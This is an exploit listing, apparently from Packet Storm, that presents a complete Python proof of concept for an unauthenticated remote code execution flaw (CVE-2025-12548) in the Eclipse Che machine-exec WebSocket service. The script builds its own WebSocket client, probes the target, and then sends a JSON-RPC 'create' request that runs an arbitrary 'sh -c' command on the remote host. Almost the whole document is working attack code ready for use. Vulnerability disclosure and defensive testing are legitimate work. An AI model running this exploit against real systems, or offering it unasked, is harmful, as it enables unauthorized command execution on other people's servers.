Share
## https://sploitus.com/exploit?id=PACKETSTORM:219562
==================================================================================================================================
    | # Title     : Eclipse Che WebSocket Machine-Exec RCE Exploit Client                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/eclipse-che/che-machine-exec                                                                  |
    ==================================================================================================================================
    
    [+] Summary    : This Python script is a WebSocket-based client designed to interact with an Eclipse Che / DevSpaces machine-exec service and test for an unauthenticated remote code execution vulnerability (CVE-2025-12548).
                     It implements a custom WebSocket client from scratch, including the handshake process, frame construction, masking/unmasking, and response parsing. 
    				 The exploit class connects to a target service, performs a basic connectivity check, and then attempts 
    				 to send a JSON-RPC request that creates a remote process by executing a shell command (sh -c <cmd>).
                     The tool includes two main modes: a vulnerability check (to verify service responsiveness and potential exposure) and an execution routine 
    				 that attempts to trigger command execution remotely and extract a process identifier from the response.
                     Overall, it is a security testing utility focused on verifying and demonstrating potential RCE exposure in a specific Eclipse Che component through WebSocket communication.
    
    [+] POC   :  
    
    #!/usr/bin/env python3
    
    import sys
    import json
    import base64
    import hashlib
    import secrets
    import socket
    import ssl
    import argparse
    import time
    
    
    OPCODE_TEXT = 0x1
    OPCODE_CLOSE = 0x8
    
    
    class WebSocketClient:
        GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
    
        def __init__(self, host, port, path="/", use_ssl=False, timeout=10):
            self.host = host
            self.port = port
            self.path = path
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.sock = None
            self.connected = False
    
        def connect(self):
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(self.timeout)
    
                if self.use_ssl:
                    ctx = ssl.create_default_context()
                    self.sock = ctx.wrap_socket(sock, server_hostname=self.host)
                else:
                    self.sock = sock
    
                self.sock.connect((self.host, self.port))
                self._handshake()
                self.connected = True
                return True
    
            except Exception as e:
                print(f"[-] Connection failed: {e}")
                return False
    
        def _handshake(self):
            ws_key = base64.b64encode(secrets.token_bytes(16)).decode()
    
            request = (
                f"GET {self.path} HTTP/1.1\r\n"
                f"Host: {self.host}:{self.port}\r\n"
                "Upgrade: websocket\r\n"
                "Connection: Upgrade\r\n"
                f"Sec-WebSocket-Key: {ws_key}\r\n"
                "Sec-WebSocket-Version: 13\r\n"
                "\r\n"
            )
    
            self.sock.send(request.encode())
    
            response = self.sock.recv(4096).decode(errors="ignore")
    
            headers = {}
            try:
                header_block = response.split("\r\n\r\n", 1)[0]
                for line in header_block.split("\r\n")[1:]:
                    if ":" in line:
                        k, v = line.split(":", 1)
                        headers[k.strip().lower()] = v.strip()
            except:
                pass
    
            if "101" not in response:
                raise Exception("Handshake failed (no 101 Switching Protocols)")
    
            accept = headers.get("sec-websocket-accept", "")
    
            expected = base64.b64encode(
                hashlib.sha1((ws_key + self.GUID).encode()).digest()
            ).decode()
    
            if accept != expected:
                raise Exception("Invalid Sec-WebSocket-Accept")
    
        def _recv_exact(self, n):
            data = b""
            while len(data) < n:
                chunk = self.sock.recv(n - len(data))
                if not chunk:
                    break
                data += chunk
            return data
    
        def send_text(self, message):
            if not self.connected:
                return False
    
            payload = message.encode()
            frame = bytearray()
    
            frame.append(0x80 | OPCODE_TEXT)
    
            length = len(payload)
    
            if length < 126:
                frame.append(0x80 | length)
            elif length < 65536:
                frame.append(0x80 | 126)
                frame.extend(length.to_bytes(2, "big"))
            else:
                frame.append(0x80 | 127)
                frame.extend(length.to_bytes(8, "big"))
    
            mask = secrets.token_bytes(4)
            frame.extend(mask)
    
            masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
            frame.extend(masked)
    
            self.sock.send(frame)
            return True
    
        def receive_frame(self):
            try:
                header = self._recv_exact(2)
                if len(header) < 2:
                    return None
    
                b1, b2 = header
                opcode = b1 & 0x0F
                length = b2 & 0x7F
    
                if length == 126:
                    length = int.from_bytes(self._recv_exact(2), "big")
                elif length == 127:
                    length = int.from_bytes(self._recv_exact(8), "big")
    
                payload = self._recv_exact(length)
    
                if opcode == OPCODE_CLOSE:
                    return None
    
                return payload.decode(errors="ignore")
    
            except Exception:
                return None
    
        def close(self):
            try:
                frame = bytearray([0x88, 0x00])  # close frame (no mask needed here simplification)
                self.sock.send(frame)
            except:
                pass
    
            try:
                self.sock.close()
            finally:
                self.connected = False
    
    
    class EclipseCheExploit:
        def __init__(self, target, port, use_ssl=False, timeout=10):
            self.target = target
            self.port = port
            self.use_ssl = use_ssl
            self.timeout = timeout
    
        def check_vuln(self):
            print(f"[*] Checking {self.target}:{self.port}")
    
            ws = WebSocketClient(self.target, self.port, "/connect", self.use_ssl, self.timeout)
    
            if not ws.connect():
                return False
    
            hello = ws.receive_frame()
            ws.close()
    
            if hello and "connected" in hello:
                print("[+] Target looks responsive (possible vulnerable service)")
                return True
    
            print("[-] Not vulnerable or no response")
            return False
    
        def execute(self, cmd):
            ws = WebSocketClient(self.target, self.port, "/connect", self.use_ssl, self.timeout)
    
            if not ws.connect():
                return False
    
            ws.receive_frame()
    
            req = {
                "jsonrpc": "2.0",
                "method": "create",
                "params": {
                    "cmd": ["sh", "-c", cmd],
                    "type": "process"
                },
                "id": 1
            }
    
            ws.send_text(json.dumps(req))
            resp = ws.receive_frame()
    
            ws.close()
    
            if not resp:
                print("[-] No response")
                return False
    
            try:
                data = json.loads(resp)
                pid = data.get("result")
    
                if not pid:
                    print("[-] Failed to get process id")
                    return False
    
                print(f"[+] Process ID: {pid}")
    
            except:
                print("[-] Invalid JSON")
                return False
    
            return True
    
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("target")
        parser.add_argument("port", type=int, nargs="?", default=3333)
        parser.add_argument("cmd", nargs="?", default="id")
        parser.add_argument("--ssl", action="store_true")
        parser.add_argument("--check-only", action="store_true")
    
        args = parser.parse_args()
    
        ex = EclipseCheExploit(args.target, args.port, args.ssl)
    
        if args.check_only:
            ex.check_vuln()
        else:
            if ex.check_vuln():
                ex.execute(args.cmd)
    
    
    if __name__ == "__main__":
        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================